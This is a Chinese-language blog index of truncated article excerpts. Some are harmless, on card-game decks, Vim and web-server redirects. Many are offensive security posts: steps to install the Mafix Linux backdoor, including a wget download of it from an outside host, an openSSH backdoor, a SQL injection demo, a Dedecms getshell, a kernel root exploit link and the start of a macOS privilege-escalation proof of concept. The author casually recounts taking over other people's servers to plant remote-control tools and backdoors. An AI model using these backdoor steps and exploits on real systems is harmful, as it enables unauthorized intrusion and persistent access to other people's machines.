Menu

Latest articles

炉石传说外服各系人气卡组
Warrior 龙战士Granit 龙战士卡组适合土豪,杀伤力也相当客观。 =============================================================================================
冠军的试炼之霜牙冰法卡组
原作者:Elyxie 翻译:raiderGUNDAM 组建这套牌的根本原因,是我想用美丽的冰龙组一套冰法。不错的嘲讽以及可怕的aoe亡语使她非常强大。当然,为了加入她,一些传统单卡被换掉是无法避免的。我决定拿掉一张爆炸羊,烈焰风暴,和安东尼达斯。加入两张碧蓝幼龙以及霜牙。 [...]
Redhat Linux安装JDK 1.7
刚刚拿下一台比较古老的Linux服务器 然后我准备给他上一个java的远控,但是java版本太低运行不了。。。。。 无奈,只能给他升级java版本了。 首先,下载JDK 1.7 安装包。 下载地址:传送门 官网下载地址:传送门 [...]
Cmstop某处sql注入漏洞
首先得注册一个账号。 http://app.cmstop.org/?app=member&controller=index&action=login 我就注册了个123123331来演示吧. //账号 123123331 密码 123123331 [...]
Linux下Nginx设置301重定向域名、目录的方法
Nginx设置301重定向相对还是比较容易的,301永久重定向不仅能使页面实现自动跳转,而且对于搜索引擎来说,可以传递网站权 重、收录以及PR值等。下面我们就详细说说Linux下Nginx设置301重定向的方法: 首先将多个域名指向同一web目录,代码如下: server_name [...]
Apache Rewrite 重定向功能的简单配置
Rewrite url重定向就是实现URL的跳转和隐藏真实地址,基于Perl语言的正则表达式规范。平时帮助我们实现拟静态,拟目录,域名跳转,防止盗链等。 1.Apache Rewrite的主要功能 [...]
Easy File Locker 忘记密码怎么办?
        如果你的服务器被人日了,挂了网马或者phpDDOS之类的文件,怎么找也找不到文件? 那么可能是使用Easy File Locker隐藏了,从新安装个Easy File [...]
Double Free浅析
最近在研究一些堆上面的漏洞。然后某一天骑自行车在路上跑的时候我突然悟出了Double Free的真谛。 2333好像太中二了一点,我是根据堆溢出的利用方法启发,再结合linux中libc的源码。研究出了double free的利用方法。虽然有关double [...]
Vim使用技巧之二
本文就说些其中比较有用, 比较常用的命令, 若能熟练运用这些命令, 那么会发现编辑文件很舒服. 说明: 以下的例子中 xxx 表示在命令模式下输入 xxx 并回车 以下的例子中 :xxx 表示在扩展模式下输入 xxx 并回车 小括号中的命令表示相关命令. 在编辑模式或可视模式下输入的命令会另外注明. 1. [...]
Vim使用技巧之一
1. 选定文字 / 拷贝粘贴 v为可视模式,可以选定多行。选定多行之后,可以用yy或者dd等等进行拷贝和剪切。 p 是粘贴 y 和d 可以直接拷贝或者剪切选定的内容 yw是拷贝一个单词 如果要复制整行的最简单办法就是V,y,p 就行了 [...]
linux文件系统基础知识
1、linux文件系统分配策略: 块分配( block allocation ) 和 扩展分配  ( extent allocation ) 块分配:磁盘上的文件块根据需要分配给文件,避免了存储空间的浪费。但当文件扩充时,会造成文件中文件块的不连续,从而导致过多的磁盘寻道时间。 [...]
Linux后门之Mafix
Linux后门有很多,openssh安装起来比较麻烦,下面介绍一款超见简单安装的Linux后门,使用方法非常简单: MAFIX 1.切换到home目录 cd /home 2.下载软件到home目录 wget http://www.k2a.cn/Tools/mafix.tar.gz 3.解压这个文件 tar [...]
Centos6.* yum的配置与安装
今天偶然间拿下一台服务器,12核速度非常快。进去一看,郁闷,啥组件功能都木有,本来想给他安装一个openssh后门的,但是PAM丢失OpenSSL丢失。yum install 运行直接报错。。。。 算了我给他重新安装一个yum吧。。。 1.删除自带的yum # rpm -aq|grep yum|xargs [...]
一次ssh被植入后门的经历及解决方案
某位小黑客从我博客下载了openssh后门,居然没有清理history这真没法忍啊!!! 前不久我一个朋友发现服务器上面很多程序被挂马了,晚上谁也没上过服务器,可以判定服务器已经被入侵了,开始排查: 1.首先查看安全日志,指定命令如下 more /var/log/secure |grep Accepted [...]
Linux渗透之openSSH后门
首先拿下服务器shell权限,其次利用各种方式提下root! 拿下root之后才是开始: 1.首先查看ssh版本: [email protected]:~# ssh -V OpenSSH_6.0p1 Debian-4+deb7u2, OpenSSL 1.0.1e 11 Feb 2013   2.下载SSH [...]
2.6.9-42.ELsmp localroot EXP
今天而然又遇到一个古老的内核2.6.9-42.ELsmp 翻一下exp貌似我有.       下载地址: 传送门
Dedecms远程写文件漏洞
0x00 漏洞概述 2015年6月17日seclists网站上公布了Dedecms的一个远程getshell漏洞细节,造成这个漏洞的原因也有些让人玩味。官方已在2015年6月18日发布了修复版本,下载链接:http://www.dedecms.com/products/dedecms/downloads/ [...]
分享Kali-Linux下一些不错的源
以下是我自己搜集整理的在kali下使用效果不错的源 vim /etc/apt/sources.list deb http://security.kali.org/ kali/updates main contrib non-free deb-src http://security.kali.org/ [...]
CVE-2015-1130 MacOS提权漏洞
废话不多说,直接上EXP ######################################################## # # PoC exploit code for rootpipe (CVE-2015-1130) # # Created by Emil Kvarnhammar, [...]
手贱iptables -F 进不去系统了怎么办?
使用 iptables -F 要小心,搞不好,你就马上同服务器断开连接了 可以通过iptables -F清除所有规则来暂时停止防火墙: (警告:这只适合在没有配置防火墙的环境中,如果已经配置过默认规则为deny的环境,此步骤将使系统的所有网络访问中断) 如果想清空的话,先执行 iptables -P [...]